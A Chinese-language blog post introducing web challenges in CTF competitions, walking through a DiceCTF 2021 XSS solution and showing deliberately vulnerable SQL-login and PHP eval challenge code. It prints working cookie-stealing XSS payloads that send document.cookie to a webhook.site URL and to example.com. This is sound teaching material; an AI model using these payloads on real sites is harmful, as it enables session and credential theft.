該如何入門 CTF 中的 Web 題?


Posted by huli on 2021-02-20

前言

知道 CTF 這東西很久了,但直到前陣子才真正去參加了線上辦的 CTF 比賽,不過因為會的東西有限,只能打 web 題,或是剛好有涉獵的 misc 題。雖然本來就覺得 CTF 很有趣,但實際去玩了以後收穫比我想像中的還多。

身為一個前端工程師,知道各種前端相關的知識十分合理,然後又因為看得文章夠多,所以除了一些新的特性以外,平時比較難有那種:「哇!居然可以這樣」的感覺。但在用心打 CTF 的兩個假日裡面,我獲得了數次這種感覺,而且是:「哇靠!!!!居然可以這樣嗎!!!」,明明就屬於前端的範疇,但我卻從來都不知道還可以這樣。

我認為前後端工程師去打 CTF 的 web 題,可以補足前後端相關的知識,而且這種知識是你平常在工作中或是生活中很難獲得的,但卻在資訊安全的領域很常見。想要防禦,就必須先知道怎麼攻擊。

因此這篇就稍微分享一下 CTF 是什麼,該如何參加,又該怎麼解題。

什麼是 CTF

其實可以先參考這兩篇文章:

  1. 跨出成為駭客的第一步,來打打看 CTF Web 吧!
  2. Day1: [Misc] What is CTF ?

不免俗地還是要講一下 CTF 的全名 Capture The Flag,奪旗。而現在講 CTF 指的應該都是以拿到「flag」為目標的遊戲或是比賽之類的。其實底下還有細分不同種模式,這篇講的會是最常見的 Jeopardy 模式,只要拿到 flag 然後在網站上送出,就可以拿到這題的分數。

而這個「flag」通常會是一個字串,帶有特定格式讓你能區分出來它是 flag。flag 可能會藏在各個地方,例如說圖片裡面啦,或者是機器內的某個檔案之類的,而你的目標就是找出這個 flag,就獲勝了。

對我來說這模式其實並不陌生,大家以前有玩過「高手過招」嗎?在高手過招裡面雖然不是以拿到一個固定的 flag 為目標,但「找到前往下一關的方法」其實就跟 flag 差不多。

之前做給學生玩的:Lidemy HTTP Challenge 還有 r3:0 異世界網站挑戰 其實也是類似的模式,找到某個 token(flag) 之後就可以前往下一關。

可是有太多地方都可以放 flag 了,難道要我們大海撈針去找嗎?有些時候可能是,但大多數時候其實並不是,有些是題目敘述就會跟你講說 flag 在哪裡,就算沒有告訴你,通常也會放在固定幾個位置。

為了讓大家更進入狀況,知道我在講什麼,我們就直接來看一下一些已經結束的 CTF 比賽,直接從畫面跟題目跟大家講解到底要做什麼。

以 DiceCTF 2021 為例

DiceCTF 2021 是前陣子剛結束的一個比賽,我直接用裡面的題目來做講解,這是一個在 CTF 比賽中很常看到的介面:

右上角是有多少人解出來以及這題的分數,在 CTF 比賽中分數是會變動的,越多人解開的題目分數就會越低。假設一開始是 500 分,100 個人解出來之後可能變成 50 分。而你拿到的分數跟「解開的時間」無關,就算你是第一個解開的(那時候是 500 分),在結算時也會用 50 分來計算。

而裡面也附上了題目敘述、網址跟讓你送出 flag 的地方,還有一個 admin bot,我們來看一下這是什麼:

這是我想跟大家介紹的第一種類型,我們就簡單稱之為「bot 類型」好了。在這種類型的題目中會有像上面這樣的網頁,讓你可以填入一個網址送出。而你填入網址之後,背後就會有一個 bot 去造訪你填入的網址(通常都是用 headless chrome 來做)。

那為什麼要這樣做呢?請注意原本題目敘述寫的:

The admin will set a cookie secret equal to config.secret in index.js.

在這種類型的題目中,會需要有一個 bot 造訪你提供的網址,通常是因為 flag 或是拿到 flag 的線索就藏在 bot 的 cookie 裡面。所以你要想辦法對 bot XSS 或是進行其他攻擊,然後把 cookie 偷出來。

仔細想想其實會發現滿合理的,因為如果要 XSS 的話一定要有對象嘛,而這個對象就是這個 admin bot。而這一題還有附上 source code:

const express = require('express');
const crypto = require("crypto");
const config = require("./config.js");
const app = express()
const port = process.env.port || 3000;

const SECRET = config.secret;
const NONCE = crypto.randomBytes(16).toString('base64');

const template = name => `
<html>

${name === '' ? '': `<h1>${name}</h1>`}
<a href='#' id=elem>View Fruit</a>

<script nonce=${NONCE}>
elem.onclick = () => {
  location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>

</html>
`;

app.get('/', (req, res) => {
  res.setHeader("Content-Security-Policy", `default-src none; script-src 'nonce-${NONCE}';`);
  res.send(template(req.query.name || ""));
})

app.use('/' + SECRET, express.static(__dirname + "/secret"));

app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`)
})

可以發現你能夠用 ?name=123 帶輸入進去,然後會跟著一起被輸出出來,所以綜合以上知識,你要做的就是:

  1. 找出上述程式碼的漏洞,讓你可以進行 XSS
  2. 假設第一步驟達成,而且最後能進行 XSS 的網址是 A,使用者一進入網址 A 就會被 XSS 攻擊
  3. 把網址 A 填入 admin bot 並送出,讓 admin bot 造訪網址 A
  4. admin bot 成功被 XSS,而你也順利把 cookie 偷出來

只要你能 XSS,在沒有其他限制的狀況下把 cookie 偷出來很簡單,假設你有一台 server 網址是:http://example.com,你只要執行:fetch('http://example.com?flag=' + document.cookie),網頁就會把 document.cookie 當成 url 的一部分一起發送到 example.com,而你可以看 server 的 access log,就會知道 cookie 裡面到底有什麼內容。

這邊推薦大家一個很好用的網站:https://webhook.site/

它可以幫你產生一個網址,然後任何被發送到網址的 request 都會被記錄下來:

今天我發送一個 request 到:https://webhook.site/076f63b2-295b-4e9e-97ef-561d6e4100b5?flag=hello,畫面就會變成這樣:

有了這個能夠觀看 request 紀錄的地方,就可以不需要自己架 server,而是透過這個服務來接收你想傳送的資料。

像是這種題型通常都是要你對 admin bot XSS 或是結合其他攻擊手法,以上面這題為例,雖然有用 CSP + nonce 但仔細觀察會發現 nonce 不會變,因此只要拿到固定的 nonce 就可以 XSS。

如果網址是:https://babier-csp.dicec.tf/?name=apple 的話,網站內容就是:

<html>

<h1>apple</h1>
<a href='#' id=elem>View Fruit</a>

<script nonce=+ZSveZwTAUqC6Pt9p+rgUg==>
elem.onclick = () => {
  location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>

</html>

那如果我的 name 改成:</h1><script nonce="+ZSveZwTAUqC6Pt9p+rgUg==">window.location='https://webhook.site/076f63b2-295b-4e9e-97ef-561d6e4100b5?flag='+document.cookie</script>

url 就是:https://babier-csp.dicec.tf/?name=%3C/h1%3E%3Cscript%20nonce=%22%2bZSveZwTAUqC6Pt9p%2brgUg==%22%3Ewindow.location=%27https://webhook.site/076f63b2-295b-4e9e-97ef-561d6e4100b5?flag=%27%2bdocument.cookie%3C/script%3E

最後產生的網頁內容就是:

<html>
<h1></h1><script nonce="+ZSveZwTAUqC6Pt9p+rgUg==">window.location='https://webhook.site/076f63b2-295b-4e9e-97ef-561d6e4100b5?flag='+document.cookie</script></h1>
<a href='#' id=elem>View Fruit</a>

<script nonce=+ZSveZwTAUqC6Pt9p+rgUg==>
elem.onclick = () => {
  location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>
</html>

把這個網址拿去給 admin bot,admin bot 就會去造訪這網頁,然後執行 window.location='https://webhook.site/076f63b2-295b-4e9e-97ef-561d6e4100b5?flag='+document.cookie,就會把它的 cookie 發送到我們的 webhook 去,就可以在剛剛的介面中看到 admin 的 cookie 內容:

根據拿到的 secret 以及上面的程式碼,造訪 /secret 之後會看到:


Hi! You should view source!

<!-- 

I'm glad you made it here, there's a flag!

<b>dice{web_1s_a_stat3_0f_grac3_857720}</b>

If you want more CSP, you should try Adult CSP.

-->

dice{web_1s_a_stat3_0f_grac3_857720}就是 flag,把這個 flag 拿去網頁介面送出,就可以拿到分數,通過這關。每一場 CTF 通常都會有固定的 flag 格式,以這場而言就是 dice{}

以上就是解這種題型的完整歷程:

  1. 查看程式碼找出漏洞,構造一個可以執行攻擊的網址
  2. 把網址送給 admin bot 去造訪
  3. admin 受到攻擊,偷到 admin 的 cookie
  4. 拿到 flag

為什麼這類型的題目都要把 flag 或是其他線索放在 cookie 呢?因為在實際攻擊的場合中,通常也是以拿到 cookie 為最終目標,所以這樣設計其實也滿合理的。只要拿到 cookie 通常也就代表拿到使用者的 token 或 credential(前提是沒有設定 httponly 啦,不然就拿不到了)。

接著我們再來看一題:

一樣有附上程式碼:

const crypto = require('crypto');
const db = require('better-sqlite3')('db.sqlite3')

// remake the `users` table
db.exec(`DROP TABLE IF EXISTS users;`);
db.exec(`CREATE TABLE users(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  username TEXT,
  password TEXT
);`);

// add an admin user with a random password
db.exec(`INSERT INTO users (username, password) VALUES (
  'admin',
  '${crypto.randomBytes(16).toString('hex')}'
)`);

const express = require('express');
const bodyParser = require('body-parser');

const app = express();

// parse json and serve static files
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static('static'));

// login route
app.post('/login', (req, res) => {
  if (!req.body.username || !req.body.password) {
    return res.redirect('/');
  }

  if ([req.body.username, req.body.password].some(v => v.includes('\''))) {
    return res.redirect('/');
  }

  // see if user is in database
  const query = `SELECT id FROM users WHERE
    username = '${req.body.username}' AND
    password = '${req.body.password}'
  `;

  let id;
  try { id = db.prepare(query).get()?.id } catch {
    return res.redirect('/');
  }

  // correct login
  if (id) return res.sendFile('flag.html', { root: __dirname });

  // incorrect login
  return res.redirect('/');
});

app.listen(3000);

像這一題就不需要什麼 XSS,因為根據程式碼,你必須讓 SQL query 可以正常執行,最後就會進入到:if (id) return res.sendFile('flag.html', { root: __dirname });,就可以看到 flag。

所以像是這種題目就順著做就好,目標就是要繞過他那個檢查。至於怎麼繞過,就留給大家自己想了。

其他常見題型

原本想舉其他 CTF 比賽當例子的,但大多數 CTF 比賽的網頁都只有比賽進行的時候會開著,結束後過幾天就關了。如果當初打的時候沒有截圖下來,就比較難重現當初的步驟。

在 CTF 中其實很多題目是混合的,需要結合不同的攻擊手法才能解開。對有些初學者來說比較難的可能是「不知道從何下手」,不知道到底 flag 會放在哪邊,看到題目也不知道要幹嘛,因此底下我簡單介紹幾種下手方式。

SQL Injection

像這類型的題目,flag 通常都放在資料庫的某處,你要透過 SQL Injection 的方式把 flag 找出來。但也要注意一點,那就是在 CTF 中許多題目其實是有很多關卡的,有可能 SQL Injection 是第一關,你會在 database 裡面找到前往下一關的線索,然後下一關可能是其他類型的題目之類的。

RCE

RCE,全名 Remote Code Evaluation,意思就是你可以遠端在其他人的電腦上面執行程式碼。以 BambooFox CTF 2021 的 ヽ(#`Д´)ノ 這題為例,就給了這樣一段程式碼:

 <?= 
    highlight_file(__FILE__) &&
    strlen($🐱=$_GET['ヽ(#`Д´)ノ'])<0x0A &&
    !preg_match('/[a-z0-9`]/i',$🐱) &&
    eval(print_r($🐱,1));

最後一個步驟是 eval,所以如果前面的判斷都通過了,你就可以執行任何你想執行的程式碼。像這種題目通常都會需要執行 shell_exec 之類的函式,例如說:shell_exec('ls /') 就可以把根目錄的檔案印出來,而 flag 就放在主機的某個位置。

有些題目會直接提示在哪裡,沒有提示的可以先找找看 /~ 或是 ./flag, ./flag.txt 之類的地方,都是滿常會放置 flag 的位置。

因此這題的目標就是要繞過判斷,好讓我們可以在主機上執行任意程式碼來找到 flag。

不給程式碼的題型

有些題目是不給程式碼的,就給你一個網址然後要你找到 flag。這類型的有可能是 SQL injection,也有可能是 RCE 或是 SSTI,這些都有可能。所以就是要從網站中尋找各種蛛絲馬跡,來看要採取什麼方式進行攻擊,找出網站的漏洞。

碰到一些「你知道大概屬於什麼類型,但不知道怎麼攻擊」的狀況時,Google 是你的好朋友。例如說我知道這題可能是 SQL injection,但我不會打,我就可以搜尋:「sql injection cheat sheet」或是「sql injection ctf」之類的關鍵字,通常都可以找到很多有用的資料。

關於繞過限制,也可以用 bypass 這個關鍵字,例如說「csp bypass」,「xss bypass」之類的。

總結

這篇真的只是簡單介紹一下 CTF 裡面常出現的 web 題的目標,通常是:

  1. 繞過某些限制
  2. 想辦法 RCE 並找出 flag
  3. 對 bot 進行 XSS
  4. 在資料庫中找到 flag

雖然說 flag 看似難找,但其實題目通常都會給一定的線索,而且 flag 放的位置通常就那幾個比較有可能,打的題目多了就會熟練了。

對於資安這塊不熟悉的人如果想接觸 Web 相關的領域,我推薦 PortSwigger 的 Web Security Academy 系列,裡面列出了很多種攻擊手法,而且還有網站可以讓你練習。

如果想試試看參加 CTF 比賽,可以看 CTF Time 這個網站,上面會有時程表,你可以找到已經辦過跟正要舉辦的比賽,報名方式很簡單,就只要註冊就行了,接著就是等比賽開始然後開始打題目。

這篇之所以是介紹「怎麼開始打 Web CTF」而不是講「我從 CTF 中學到的 web 技巧」,是因為我覺得那些學到的技巧,直接寫出來是沒有什麼用的。CTF 的解法最美妙的一點就在「你有努力想過」,這很重要。

舉例來說,如果我現在給你一個題目,然後讓你想五分鐘,五分鐘之後跟你講答案,你可能會覺得「喔,原來是這樣」。但如果給你五個小時,然後這五個小時之中你試遍了各種方法都解不開,這時候跟你講解法,你大概會:「哇操!!!!太神了吧!!!可以這樣解喔!!!」,而這是只有花時間付出的人可以體會到的樂趣。

在沒有努力思考之前直接把解法講出來就會大幅度減少這種樂趣。

還有一點我覺得很棒,那就是 CTF 比賽結束之後通常都會有每個參賽者的 writeup,可以想成就是解法的筆記,會敘述自己怎麼思考然後用什麼方法把題目解開的,一個題目可能不只有一個解法,可以從其他人的解法中學習到很多。

如果你是有些經驗的前後端工程師,非常推薦大家接觸一下資安的領域,透過 CTF 比賽學習各種前後端的攻擊方法,有可能會讓你大開眼界,得到很多新的知識,讓你能寫出更安全的網站。












Related Posts

4.1-4.3_使用者輸入輸出與字串物件操作

4.1-4.3_使用者輸入輸出與字串物件操作

Day 66 - Cafe API Project & RESTful route

Day 66 - Cafe API Project & RESTful route

Git Workflow

Git Workflow




Newsletter




Comments